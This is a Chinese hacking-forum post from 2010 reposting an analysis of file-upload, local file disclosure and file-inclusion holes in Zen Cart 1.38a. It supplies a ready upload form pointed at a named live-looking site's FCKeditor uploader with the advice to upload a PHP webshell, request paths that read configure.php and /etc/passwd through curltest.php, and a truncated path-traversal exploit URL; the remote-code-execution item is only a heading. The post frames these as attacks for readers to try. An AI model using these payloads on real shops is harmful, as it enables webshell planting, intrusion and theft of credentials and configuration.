【3.A.S.T】网络安全爱好者 - Powered by Discuz! Board

标题: zen cart 1.38a多处漏洞分析 [打印本页]

作者: 晓谛 时间: 2010-11-6 18:30 标题: zen cart 1.38a多处漏洞分析

zen cart 1.38a多处漏洞分析
发布日期：2010-10.27
发布作者：佚名

影响版本：zen cart 1.38a

漏洞类型：文件上传、文件包含、代码执行
漏洞描述：

漏洞1、

<form id="frmUpload" enctype="multipart/form-data" action="http://aus-snowboots.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">
Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>
大家试下威力。

直接上传PHP WEBSHELL 到IMAGES

漏洞2

Zen Cart 本地文件泄露
得到网页所在路径
/extras/ipn_test_return.php
得到网站配置信息
/extras/curltest.php?url=file:///网站地址/includes/configure.php
读取linux服务器passwd
/extras/curltest.php?url=file:///etc/passwd

漏洞3
Zen Cart v1.3.9f (typefilter) 本地文件包含漏洞
EXP:http://127.0.0.1/index.php?typef ... %2F..%2Fboot.ini%00

直接给出EXP 很早的依然很强大。。。。。。

漏洞4、远程代码执行

欢迎光临【3.A.S.T】网络安全爱好者 (http://www.3ast.com/)